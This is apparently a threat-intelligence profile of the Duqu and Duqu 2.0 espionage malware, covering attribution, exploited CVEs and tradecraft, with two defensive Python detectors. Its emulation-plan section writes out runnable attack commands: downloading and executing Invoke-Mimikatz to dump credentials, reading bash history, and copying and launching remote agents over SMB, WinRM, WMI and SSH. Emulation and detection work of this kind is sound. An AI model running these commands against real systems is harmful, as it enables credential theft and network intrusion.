Threat Actor

Duqu / Duqu 2.0

duqu · us_israel_joint_offensive_cyber_speculation · active since 2007

Duqu / Duqu 2.0 is a cyber-espionage malware cluster operationally adjacent to the Stuxnet Olympic Games operation. Naming: canonical Symantec / CrySyS Duqu naming after Duqu's RPC component creating files prefixed with ~DQ, per the CrySyS Lab September 1, 2011 canonical discovery; Duqu 2.0 is the successor variant per the Kaspersky June 10, 2015 self-targeting canonical disclosure; CrySyS Lab's alternative naming for Duqu 2.0 is "the resurrection of Duqu". Cluster-cell-significant Tilded platform shared codebase with Stuxnet per the Kaspersky December 2011 canonical attribution ("platform, which has been dubbed 'Tilded' because of the tendency of its creators to use files that start with the tilde symbol (~), was used for the creation of Stuxnet and Duqu, and also other malicious programs"). Operationally significant as the canonical Stuxnet shared-codebase sibling cluster and the first publicly known major cyber-attack against a cybersecurity research vendor (Duqu 2.0 Kaspersky Lab self-targeting, June 2015).

Speculatively attributed to a US-Israel joint offensive cyber operation (cluster cell coherence with the Stuxnet Olympic Games operation) per Kaspersky's Tilded platform shared-codebase attribution and Symantec's Stuxnet-Duqu code overlap analysis (three points of interest: the installer exploits zero-day Windows kernel vulnerabilities; components are signed with stolen digital keys; Duqu and Stuxnet are both highly targeted and related to the nuclear program of Iran). The Duqu 2.0 variant is operationally attributed to Israeli Unit 8200 specifically per the NYT, June 2015 ("believed to be the work of Unit 8200, an Israeli Intelligence Corps unit of the Israel Defense Forces"), the most specific public attribution of any Olympic Games cluster.

The original Duqu operationally conducted cyber-espionage / industrial-control-system design-information gathering as a precursor to Stuxnet operational deployment (operationally a reconnaissance / pre-operational stage of the broader Olympic Games campaign).

Signature initial access vector: CVE-2011-3402 TrueType font parsing kernel zero-day, delivered via a malicious Microsoft Word document.

Signature stolen Taiwanese code signing certificates (C-Media Electronics + Foxconn; operationally similar to but distinct from Stuxnet's Realtek + JMicron stolen Taiwanese certificates), revoked October 14, 2011.

Signature JPEG image-file C2 traffic concealment (encrypted data appended to harmless image files, steganography-adjacent).

The Duqu 2.0 successor variant operationally targeted Kaspersky Lab itself (signature first publicly known major cyber-attack against a cybersecurity research vendor; Kaspersky Lab networks were compromised for months without knowledge, per Eugene Kaspersky's Forbes June 2015 acknowledgment "most probably carried out by a government-backed group"; Symantec's Gavin O'Gorman commented: "Attacking a security company - and what clearly is a nation-state attacker going after a private security company that is meant to be protecting customers and so on - is quite galling"), plus P5+1 Iran nuclear deal negotiations venues in hotels in Austria and Switzerland (sites of international negotiations with Iran over its nuclear program and economic sanctions), Western organizations operating in Asia and the Middle East, and IT security firms.

Duqu 2.0 signature multi-zero-day operational chain (CVE-2015-2360 kernel + CVE-2014-4148 TrueType font + CVE-2014-6324 Kerberos privilege escalation) and signature in-memory-only persistence tradecraft (no on-disk persistence, operationally designed to defeat forensic recovery via reboot), with traffic concealment via JPEG + GIF image files carrying appended encrypted data and multiple user agent strings for HTTP C2 obfuscation, per Infosec Institute.

Signature trusted-process injection via antivirus product detection: per Symantec, Duqu maintains a list of known AV products used to select services.exe or lsass.exe as the trusted-process injection target, with a 0xb3 0x1f XOR encrypted strings pattern.

Fills the 3rd Olympic Games / US-Israel joint cyber-operations cell in the curated corpus, following Stuxnet (1st) and Flame (2nd), operationally completing the canonical Olympic Games / US-Israel joint cyber-operations cluster cell: Stuxnet (cyber-sabotage) + Flame (cyber-espionage massive modular platform) + Duqu/Duqu 2.0 (cyber-espionage Stuxnet-sibling reconnaissance + diplomatic venue signals intelligence + cybersecurity research vendor self-targeting) capability cell coherence.

Continued industry reference status as the canonical Stuxnet shared-codebase Tilded platform sibling cluster and the first publicly known major cyber-attack against a cybersecurity research vendor, cited in essentially all subsequent Olympic Games and state-actor-tier cyber-espionage platform industry analyses through the 2011-2026 period.

Attribution: us_israel_joint_offensive_cyber_speculation · confidence: high · 16 aliases

Profile

Duqu / Duqu 2.0 is a cyber-espionage malware cluster operationally adjacent to the Stuxnet Olympic Games operation. Naming: canonical Symantec / CrySyS Duqu naming after Duqu's RPC component creating files prefixed with ~DQ; Duqu 2.0 is the successor variant per the Kaspersky June 10, 2015 self-targeting canonical disclosure; CrySyS Lab's alternative naming for Duqu 2.0 is "the resurrection of Duqu". Cluster-cell-significant Tilded platform shared codebase with Stuxnet per the Kaspersky December 2011 canonical attribution. Operationally significant as the canonical Stuxnet shared-codebase sibling cluster and the first publicly known major cyber-attack against a cybersecurity research vendor (Duqu 2.0 Kaspersky self-targeting, June 2015).

Operationally signature for:
(a) Tilded platform shared codebase with Stuxnet, establishing cluster-cell coherence within the Olympic Games / US-Israel joint cyber-operations cell.
(b) Cyber-espionage precursor / industrial-control-system design-information gathering mission objective, complementary to Stuxnet cyber-sabotage.
(c) Duqu 2.0 cluster-cell-significant Kaspersky self-targeting and P5+1 Iran nuclear deal negotiations venues targeting.
(d) Signature Israeli Unit 8200 specific attribution per NYT June 2015, the most specific public attribution of any Olympic Games cluster.

Operational phases:
  • (1) Tilded platform origin (c. 2007-2008): shared codebase platform development with Stuxnet.
  • (2) Duqu earliest documented activity (c. 2008-2011): cyber-espionage precursor to Stuxnet.
  • (3) Duqu CrySyS canonical discovery (September 1, 2011).
  • (4) Symantec Stuxnet-Duqu code overlap analysis (October 2011).
  • (5) Duqu Taiwanese stolen certificate revocation (October 14, 2011).
  • (6) Kaspersky Tilded platform attribution (December 2011).
  • (7) Duqu 2.0 Kaspersky self-targeting disclosure (June 10, 2015): first publicly known major cyber-attack against a cybersecurity research vendor.
  • (8) Duqu 2.0 P5+1 Iran nuclear deal venues targeting (2014-2015): Austrian + Swiss hotels targeting.
  • (9) New York Times Unit 8200 attribution (June 2015): most specific public attribution of any Olympic Games cluster.
  • (10) Continued industry reference status (2011-2026).

Signature operational tradecraft
  • Tilded platform shared codebase with Stuxnet (cluster-defining): per Kaspersky December 2011, "the platform... was used for the creation of Stuxnet and Duqu, and also other malicious programs."
  • TrueType font parsing kernel zero-day initial access vector (signature): CVE-2011-3402 via malicious Microsoft Word document, the original Duqu's signature zero-day.
  • Stolen Taiwanese code signing certificates (signature): C-Media Electronics + Foxconn stolen Taiwanese code signing certificates (operationally similar to but distinct from Stuxnet's Realtek + JMicron stolen Taiwanese certificates).
  • JPEG/GIF image-file C2 traffic concealment (signature): encrypted data appended to harmless image files, signature steganography-adjacent C2.
  • Duqu 2.0 in-memory-only persistence (signature evolution): no on-disk persistence, operationally designed to defeat forensic recovery via reboot.
  • Duqu 2.0 multi-zero-day operational chain (signature): CVE-2015-2360 + CVE-2014-4148 + CVE-2014-6324.
  • Duqu 2.0 Kaspersky self-targeting (cluster-cell-significant): first publicly known major cyber-attack against a cybersecurity research vendor.
  • Duqu 2.0 P5+1 nuclear deal venues targeting (signature): Austrian + Swiss hotels hosting Iran nuclear deal international negotiations.
  • Israeli Unit 8200 NYT attribution (signature): most specific public attribution of any Olympic Games cluster.
  • Trusted-process injection via antivirus product detection (signature): per Symantec, Duqu maintains a list of known antivirus products for trusted-process injection target selection (services.exe + lsass.exe).

The cluster fills the 3rd Olympic Games / US-Israel joint cyber-operations cell in this curated corpus following Stuxnet (1st) + Flame (2nd). Operationally completes the canonical Olympic Games / US-Israel joint cyber-operations cluster cell with Stuxnet (cyber-sabotage) + Flame (cyber-espionage massive modular platform) + Duqu/Duqu 2.0 (cyber-espionage Stuxnet-sibling reconnaissance + diplomatic venue + self-targeting attack).
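The image-file C2 concealment listed above (encrypted data appended after an otherwise harmless image) leaves a structural trace a defender can check for: a JPEG ends at its EOI marker, so anything after it is foreign to the format. The following is an added detection example written for this page, not Duqu code and not from any of the cited reports. It walks the JPEG marker structure to find the true end of image and then reports the size and Shannon entropy of whatever trails it. The sample image bytes, the pseudo-ciphertext filler and the alert thresholds are constructed assumptions.

```python
import hashlib
import math
from collections import Counter

# JPEG marker bytes (ITU T.81). Markers without a length field are handled separately below.
SOI, EOI, SOS, TEM = 0xD8, 0xD9, 0xDA, 0x01


def find_jpeg_eoi(data: bytes) -> int:
    """Walk the marker structure and return the offset just past the EOI marker,
    or -1 if the bytes are not a well-formed JPEG."""
    if len(data) < 2 or data[:2] != b"\xff\xd8":
        return -1
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            return -1
        marker = data[pos + 1]
        if marker == 0xFF:                      # fill byte before a marker
            pos += 1
            continue
        if marker == EOI:
            return pos + 2
        if marker in (TEM, SOI) or 0xD0 <= marker <= 0xD7:   # standalone markers: TEM, SOI, RSTn
            pos += 2
            continue
        if pos + 4 > len(data):
            return -1
        seg_len = int.from_bytes(data[pos + 2:pos + 4], "big")  # length covers its own two bytes
        if seg_len < 2:
            return -1
        pos += 2 + seg_len
        if marker == SOS:
            # Entropy-coded data follows SOS. 0xFF is escaped as FF 00 and FF D0..D7 are
            # restart markers, so the scan stops only at the next real marker.
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break
                pos += 1
    return -1


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte: close to 8.0 for encrypted or compressed data, low for text or padding."""
    if not buf:
        return 0.0
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values())


def inspect_jpeg(data: bytes, min_tail: int = 64, min_entropy: float = 7.0) -> dict:
    """Report bytes trailing the true end of image. The thresholds are tunable assumptions:
    a long, high-entropy tail is consistent with an appended encrypted payload."""
    end = find_jpeg_eoi(data)
    if end < 0:
        return {"valid_jpeg": False, "trailing_bytes": 0, "tail_entropy": 0.0, "suspicious": False}
    tail = data[end:]
    entropy = round(shannon_entropy(tail), 2)
    return {
        "valid_jpeg": True,
        "trailing_bytes": len(tail),
        "tail_entropy": entropy,
        "suspicious": len(tail) >= min_tail and entropy >= min_entropy,
    }


# Constructed minimal JPEG: SOI, APP0/JFIF, SOS with a few bytes of scan data (including FF00
# stuffing and an RST0 marker), EOI. Not a real picture, only a structurally valid carrier.
CLEAN_JPEG = (
    b"\xff\xd8"
    + b"\xff\xe0" + (16).to_bytes(2, "big") + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    + b"\xff\xda" + (8).to_bytes(2, "big") + b"\x01\x01\x00\x00\x3f\x00"
    + b"\x12\x34\xff\x00\x56\x78\xff\xd0\x9a\xbc"
    + b"\xff\xd9"
)


def pseudo_ciphertext(n_blocks: int) -> bytes:
    """Deterministic high-entropy filler standing in for an appended encrypted blob (constructed)."""
    out, block = b"", b"constructed-sample-seed"
    for _ in range(n_blocks):
        block = hashlib.sha256(block).digest()
        out += block
    return out


TAINTED_JPEG = CLEAN_JPEG + pseudo_ciphertext(32)   # 1024 bytes appended after EOI

if __name__ == "__main__":
    for name, img in (("clean", CLEAN_JPEG), ("tainted", TAINTED_JPEG)):
        print(name, inspect_jpeg(img))
```

Walking the markers rather than searching for the last FF D9 matters because an appended ciphertext can itself contain that byte pair; the entropy measurement separates encrypted tails from benign trailers such as text metadata left by image editors. The same idea applies to GIF (trailer byte 0x3B), which this block does not parse.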
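The trusted-process injection bullet above names the two hosts Duqu selected, services.exe and lsass.exe. From the defender's side, injection into either requires a handle with write and thread-creation rights, which endpoint telemetry records as a process-access event. The block below is an added detection example for this page, not code from Symantec or any other cited source: it parses flattened event lines whose field names follow Sysmon Event ID 10 (SourceImage, TargetImage, GrantedAccess) and alerts when a non-allowlisted image obtains injection-capable rights on a watched target. The sample events and the allowlist are constructed assumptions; the access-right constants are the standard Windows values.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List

# Windows process access rights (winnt.h). Writing code into another process and starting a
# thread in it needs at least these three bits on the handle.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
INJECT_BITS = {
    PROCESS_CREATE_THREAD: "PROCESS_CREATE_THREAD",
    PROCESS_VM_OPERATION: "PROCESS_VM_OPERATION",
    PROCESS_VM_WRITE: "PROCESS_VM_WRITE",
}

# The two trusted-process hosts the profile names as Duqu's injection targets.
WATCHED_TARGETS = {"services.exe", "lsass.exe"}

# Source images allowed to hold such handles. Assumed baseline for this example only;
# a real deployment derives it from its own environment.
ALLOWED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}

_KV = re.compile(r"(\w+)=(\S+)")


@dataclass
class Alert:
    source: str
    target: str
    granted_access: int
    rights: str


def parse_event(line: str) -> dict:
    """Parse a flattened 'Key=Value' event line into a dict."""
    return dict(_KV.findall(line))


def detect_trusted_process_injection(lines: Iterable[str],
                                     allowed_sources=ALLOWED_SOURCES) -> List[Alert]:
    """Flag ProcessAccess events where a non-allowlisted image obtains injection-capable
    rights on one of the watched trusted processes."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "10":            # only ProcessAccess events
            continue
        source = ev.get("SourceImage", "").lower()
        target = ev.get("TargetImage", "").lower()
        if target.rsplit("\\", 1)[-1] not in WATCHED_TARGETS:
            continue
        if source in allowed_sources:
            continue
        granted = int(ev.get("GrantedAccess", "0"), 16)
        hit = [name for bit, name in INJECT_BITS.items() if granted & bit]
        if hit:
            alerts.append(Alert(source, target, granted, "|".join(hit)))
    return alerts


# Constructed sample events (not real telemetry). Field names follow Sysmon Event ID 10.
SAMPLE_EVENTS = [
    r"EventID=10 SourceImage=C:\Windows\System32\csrss.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1FFFFF",
    r"EventID=10 SourceImage=C:\Users\Public\update.exe TargetImage=C:\Windows\System32\services.exe GrantedAccess=0x1F0FFF",
    r"EventID=10 SourceImage=C:\Windows\System32\taskmgr.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1000",
    r"EventID=10 SourceImage=C:\Windows\explorer.exe TargetImage=C:\Windows\System32\notepad.exe GrantedAccess=0x1F0FFF",
    r"EventID=1 Image=C:\Windows\System32\services.exe CommandLine=services.exe",
]

if __name__ == "__main__":
    for a in detect_trusted_process_injection(SAMPLE_EVENTS):
        print(f"ALERT {a.source} -> {a.target} GrantedAccess={a.granted_access:#x} ({a.rights})")
```

Only the second sample event fires: the csrss.exe access is allowlisted, the taskmgr.exe handle carries only PROCESS_QUERY_LIMITED_INFORMATION (0x1000), and notepad.exe is not a watched target. Filtering on the specific rights rather than on any access at all is what keeps this rule usable, since many legitimate tools open lsass.exe and services.exe with query-only rights.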

Aliases

16
duqu, duqu_malware, duqu_worm, duqu_trojan, duqu_2, duqu 2.0, duqu_2_0, duqu_resurrection, tilded_platform, tilded platform, tilde_platform, duqu stuxnet sibling, duqu cyber espionage precursor, duqu 2.0 kaspersky self-targeting 2015, duqu unit 8200 israel, duqu p5+1 iran nuclear deal venues 2015

Adversary Emulation Plan

13 steps
Runnable Caldera emulation profile "Worm - Move laterally any way possible". Ordered along the attack lifecycle; each step maps to an ATT&CK technique with a concrete executor command. For authorized red-team / purple-team exercises only.
0 collection T1005 · Data from Local System darwin, linux
Parse SSH config
pip install stormssh && storm list
1 credential-access T1552.003 · Unsecured Credentials: Bash History darwin, linux
Dump history
find ~/.bash_sessions -name '*' -exec cat {} \; 2>/dev/null
2 discovery T1135 · Network Share Discovery windows
View admin shares
Get-SmbShare | ConvertTo-Json
3 discovery T1018 · Remote System Discovery darwin, linux, windows
Collect ARP details
arp -a
Run PowerKatz
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };
$web = (New-Object System.Net.WebClient);
$result = $web.DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/4c7a2016fc7931cd37273c5d8e17b16d959867b3/Exfiltration/Invoke-Mimikatz.ps1");
iex $result; Invoke-Mimikatz -DumpCreds
5 discovery T1018 · Remote System Discovery windows
Find Hostname
nbtstat -A #{remote.host.ip}
6 discovery T1018 · Remote System Discovery windows
Reverse nslookup IP
nslookup #{remote.host.ip}
Mount Share
net use \\#{remote.host.fqdn}\C$ /user:#{domain.user.name} #{domain.user.password}
Copy 54ndc47 (SMB)
$path = "sandcat.go-windows";
$drive = "\\#{remote.host.fqdn}\C$";
Copy-Item -v -Path $path -Destination $drive"\Users\Public\s4ndc4t.exe";
9 lateral-movement T1570 · Lateral Tool Transfer windows, darwin, linux
Copy 54ndc47 (WinRM and SCP)
$job = Start-Job -ScriptBlock {
  $username = "#{domain.user.name}";
  $password = "#{domain.user.password}";
  $secstr = New-Object -TypeName System.Security.SecureString;
  $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
  $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
  $session = New-PSSession -ComputerName "#{remote.host.name}" -Credential $cred;
  $location = "#{location}";
  $exe = "#{exe_name}";
  Copy-Item $location -Destination "C:\Users\Public\svchost.exe" -ToSession $session;
  Start-Sleep -s 5;
  Remove-PSSession -Session $session;
};
Receive-Job -Job $job -Wait;
Start 54ndc47 (WMI)
$node = '''#{remote.host.fqdn}''';
$user = '''#{domain.user.name}''';
$password = '''#{domain.user.password}''';
wmic /node:$node /user:$user /password:$password process call create "powershell.exe C:\Users\Public\s4ndc4t.exe -server #{server} -group #{group}";
Start Agent (WinRM)
$username = "#{domain.user.name}";
$password = "#{domain.user.password}";
$secstr = New-Object -TypeName System.Security.SecureString;
$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
$session = New-PSSession -ComputerName #{remote.host.name} -Credential $cred;
Invoke-Command -Session $session -ScriptBlock{start-job -scriptblock{cmd.exe /c start C:\Users\Public\svchost.exe -server #{server} }};
Start-Sleep -s 5;
Remove-PSSession -Session $session;
12 lateral-movement T1021.004 · Remote Services: SSH darwin, linux
Start 54ndc47
scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go &&
ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'

Notable Campaigns

13
2015 · Duqu 2.0 Kaspersky Self-Targeting Disclosure (June 10, 2015)
2015 · Duqu 2.0 In-Memory Persistence Tradecraft
2015 · New York Times Unit 8200 Attribution (June 2015)
2014-2015 · Duqu 2.0 Zero-Day Operational Chain (2014-2015)
2014-2015 · Duqu 2.0 P5+1 Iran Nuclear Deal Negotiations Venues Targeting (2014-2015)
2011-2026 · Continued Industry Reference Status (2011-2026)
2011-2012 · CVE-2011-3402 TrueType Font Kernel Zero-Day Microsoft Patch
2011 · Symantec Stuxnet-Duqu Code Overlap Analysis (October 2011)
2011 · Kaspersky Tilded Platform Attribution (December 2011)
2011 · Duqu Taiwanese Stolen Certificate Revocation (October 14, 2011)
2011 · Duqu CrySyS Canonical Discovery (September 1, 2011)
2008-2011 · Duqu Earliest Documented Activity (c. 2008-2011)
2007-2008 · Tilded Platform Origin (c. 2007-2008)

Attribution & Reporting

Attributed by
  • CrySyS Lab, Budapest University of Technology and Economics (canonical Duqu discovery September 1, 2011 + Duqu 2.0 analysis 2015)
  • Kaspersky GReAT (canonical Tilded platform attribution December 2011 + Duqu 2.0 self-targeting disclosure June 10, 2015)
  • Symantec (Duqu technical analysis + Stuxnet-Duqu code overlap analysis)
  • Dell SecureWorks (initial Duqu-Stuxnet relationship skepticism, subsequently superseded by Kaspersky Tilded attribution)
  • New York Times (canonical Duqu 2.0 Israeli Unit 8200 attribution June 2015)
  • Eugene Kaspersky (Kaspersky Lab CEO, canonical Duqu 2.0 self-targeting acknowledgment, Forbes June 2015)
  • Gavin O'Gorman (Symantec Security Response Team)
  • Unit 8200 IDF (signature attribution per NYT)
  • Microsoft Security Response Center (CVE-2011-3402 TrueType kernel zero-day patch)
  • F-Secure (Mikko Hyppönen historical analysis)
  • Trend Micro (Duqu adjacent analysis)
  • MAHER Center, Iranian National CERT (Duqu Iranian impact analysis)
Key reporting
  • CrySyS Lab, Budapest University of Technology and Economics (Bencsáth + Pék + Buttyán + Félegyházi): Duqu, A Stuxnet-like malware found in the wild (September 1, 2011), canonical Duqu discovery + analysis
  • Kaspersky Lab GReAT: Stuxnet/Duqu, The Evolution of Drivers (December 2011), canonical Tilded platform attribution
  • Symantec: W32.Duqu, The Precursor to the Next Stuxnet (October 2011), canonical Symantec Duqu analysis
  • Kaspersky Lab GReAT (Igor Soumenkov + Eugene Kaspersky): Duqu 2.0, A new sophisticated malware platform exploiting up to three zero-day vulnerabilities (June 10, 2015), canonical Duqu 2.0 self-targeting disclosure
  • CrySyS Lab: The resurrection of Duqu (2015), canonical academic Duqu 2.0 follow-up analysis
  • New York Times: Israeli Spy Discovered in Kaspersky Lab Networks (June 11, 2015), canonical Israeli Unit 8200 attribution
  • Eugene Kaspersky (Forbes, June 2015): Kaspersky Lab Duqu 2.0 self-targeting acknowledgment
  • Symantec (Gavin O'Gorman): Duqu 2.0 commentary, 'nation-state attacker going after a private security company'
  • F-Secure: Duqu / Duqu 2.0 historical analysis
  • Infosec Institute: Duqu 2.0, The most sophisticated malware ever seen (2015)
  • BankInfoSecurity: Duqu 2.0 Espionage Malware Discovered (June 2015)
  • Dell SecureWorks: Initial Duqu-Stuxnet relationship skepticism analysis (subsequently superseded by Tilded attribution)
  • MITRE ATT&CK Software S0038: Duqu
  • Malpedia Software Profile: Duqu

Operational

State sponsor

Speculatively attributed to a US-Israel joint offensive cyber operation (cluster cell coherence with the Stuxnet Olympic Games operation) per multiple convergent analyses, with the Duqu 2.0 variant operationally attributed to Israeli Unit 8200 specifically per New York Times reporting following Kaspersky's June 10, 2015 Duqu 2.0 self-targeting disclosure. Cluster-cell-coherence attribution basis:

(1) Kaspersky Tilded platform shared codebase attribution (December 2011). Per the Kaspersky press release, December 2011: "The platform, which has been dubbed 'Tilded' (because of the tendency of its creators to use files that start with the tilde symbol (~)), in the opinion of Kaspersky Lab's experts was used for the creation of Stuxnet and Duqu, and also other malicious programs. The connection between Duqu and Stuxnet was revealed during the analysis of one of the incidents with regard to Duqu. During the investigation of the infected system thought to have been attacked in August 2011, a driver was found that was similar to the one used by one of the versions of Stuxnet. Though there were clear likenesses between the two drivers, there were also some differences in the details, such as the date of signing of the digital certificate." The Tilded platform attribution operationally established the canonical Stuxnet-Duqu shared-codebase platform attribution.

(2) Symantec Stuxnet-Duqu code overlap analysis. Per the HandWiki canonical compilation: "Experts compared the similarities and found three points of interest: The installer exploits zero-day Windows kernel vulnerabilities. Components are signed with stolen digital keys. Duqu and Stuxnet are both highly targeted and related to the nuclear program of Iran. Like Stuxnet, Duqu attacks Microsoft Windows systems using a zero-day vulnerability." Per Symantec: "Duqu injection target selection is very similar to the mechanism of Stuxnet."

(3) Mission objective complementarity to Stuxnet. Per industry analysis, Duqu was operationally a cyber-espionage / industrial-control-system design-information gathering precursor to Stuxnet, operationally a reconnaissance / pre-operational stage of the broader Olympic Games campaign. Per BankInfoSecurity: "Malware researchers have previously suggested that whoever commissioned Stuxnet, which was found in 2010, also had a hand in Duqu, which was discovered in 2011. Stuxnet was allegedly the product of a U.S.-Israeli cyberweapons program code-named Olympic Games, although the White House has never confirmed those allegations."

(4) Duqu 2.0 Israeli Unit 8200 specific attribution (signature). Per the Wikipedia Duqu 2.0 entry: "The malware, which infected Kaspersky Lab for months without their knowledge, is believed to be the work of Unit 8200, an Israeli Intelligence Corps unit of the Israel Defense Forces. The New York Times alleges this breach of Kaspersky in 2014 is what allowed Israel to notify the US of Russian hackers using Kaspersky software to retrieve sensitive data." The Duqu 2.0 Israeli Unit 8200 attribution operationally established the most specific public attribution of any Olympic Games cluster (operationally more specific than Stuxnet's US-Israel general attribution or Flame's US-Israel speculative attribution).

Operational mission objective (Duqu original, 2011): Duqu operationally conducted cyber-espionage targeting manufacturers of industrial control systems and other organizations related to Iran's nuclear program. Operationally a precursor / reconnaissance phase of the Olympic Games campaign, it collected design information and ICS topology mapping that subsequently informed Stuxnet operational development.

Operational mission objective (Duqu 2.0, 2015): Per Infosec Institute, BankInfoSecurity and Wikipedia, Duqu 2.0 operationally targeted: (a) Kaspersky Lab itself (operationally significant threat-research-vendor self-targeting attack; Kaspersky Lab networks compromised for months without knowledge until Duqu 2.0 detection); (b) P5+1 Iran nuclear deal negotiations venues in hotels in Austria and Switzerland (sites of international negotiations with Iran over its nuclear program and economic sanctions); (c) other Western organizations and entities operating in Asia and the Middle East; (d) IT security firms (operationally significant threat-research-industry targeting pattern). Per Eugene Kaspersky (Kaspersky Lab CEO), Forbes, June 2015: Duqu 2.0 was "most probably carried out by a government-backed group". "While they managed to get access to data related to our R&D and new technologies ... our customers and partners were not affected and are not at risk." Per Kaspersky, no plausible motive could be ascribed for why the Duqu gang would want to infiltrate Kaspersky Lab networks unless it was to keep tabs on the company's investigation techniques and findings.

Per Gavin O'Gorman (Symantec Security Response Team member): "Attacking a security company - and what clearly is a nation-state attacker going after a private security company that is meant to be protecting customers and so on - is quite galling."

Operational discovery + disclosure context: (a) CrySyS Lab September 1, 2011 canonical Duqu discovery: the original Duqu malware and related attack platform were first discovered on September 1, 2011 by the Laboratory of Cryptography and System Security (CrySyS) at the Budapest University of Technology and Economics. CrySyS Lab disclosed Duqu via subsequent published analysis. Per HandWiki: "Duqu is a collection of computer malware discovered on 1 September 2011, thought by Kaspersky Labs to be related to the Stuxnet worm and to have been created by Unit 8200." (b) Stuxnet-Duqu relationship establishment timing: per HandWiki: "Another source, Dell SecureWorks, reports that Duqu may not be related to Stuxnet. However, there is considerable and growing evidence that Duqu is closely related to Stuxnet." The subsequent Kaspersky December 2011 Tilded platform attribution operationally consolidated the Stuxnet-Duqu relationship. (c) Duqu 2.0 Kaspersky self-targeting disclosure, June 10, 2015: Kaspersky discovered the Duqu 2.0 infection in Kaspersky Lab's own networks in early 2015 and published the canonical disclosure on June 10, 2015. Per CrySyS Lab: "After analyzing the samples that we received, we think that the attackers behind the Duqu malware are back and active", CrySyS naming it "the resurrection of Duqu."

Operational classification: nation-state-tier cyber-espionage operation operationally adjacent to the Stuxnet Olympic Games cluster, operationally signature for (a) Tilded platform shared codebase with Stuxnet establishing cluster-cell coherence; (b) cyber-espionage precursor mission objective to Stuxnet; (c) Duqu 2.0 cluster-cell-significant Kaspersky self-targeting and P5+1 nuclear deal venues targeting with specific Israeli Unit 8200 NYT attribution. The cluster fills the 3rd Olympic Games / US-Israel joint cyber-operations cell in this curated corpus following Stuxnet (1st) and Flame (2nd). Operationally significant as the canonical Stuxnet shared-codebase sibling cluster and the signature first publicly known major cyber-attack against a cybersecurity research vendor (Duqu 2.0 Kaspersky self-targeting).
Motivations
cyber_espionage_precursor_reconnaissance_for_stuxnet_olympic_games, industrial_control_system_design_information_gathering, iranian_nuclear_program_related_organization_targeting, duqu_2_0_p5_plus_1_iran_nuclear_deal_negotiations_targeting, duqu_2_0_kaspersky_threat_research_vendor_self_targeting, duqu_2_0_western_organizations_asia_middle_east_targeting, tilded_platform_shared_codebase_stuxnet_olympic_games_cluster_cell_coherence, signature_unit_8200_israeli_attribution_per_nyt_duqu_2_0, threat_research_vendor_intelligence_collection_capability, p5_plus_1_diplomatic_venue_signals_intelligence_collection
Sectors
Regions

Detection Blind Spots

60 techniques
Across this actor’s 60 mapped techniques, the share covered by each detection layer. Low bars are where you’d be blind if this actor targeted you.
Behavioral / log (Sigma): 53/60 · 88%
Analytics (MITRE CAR): 23/60 · 38%
Runtime / container (Falco): 7/60 · 11%
File / malware (YARA): 0/60 · 0%
Network (Suricata/Snort): 16/60 · 26%
Vuln scan (Nuclei): 0/60 · 0%

Atomic Test Plan

30 techniques
Runnable Atomic Red Team tests covering this actor’s mapped techniques: validate your detections against this specific adversary. Cross-reference the blind spots above. For authorized lab / purple-team use.

Tools Used

0 mapped
Other tooling / TTPs (curation, not ATT&CK-mapped):
  • Malicious Microsoft Word document with embedded TrueType font exploit
  • Multiple user agent strings HTTP C2 communication
  • services.exe trusted process injection
  • Stolen digital keys overlap with Stuxnet
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin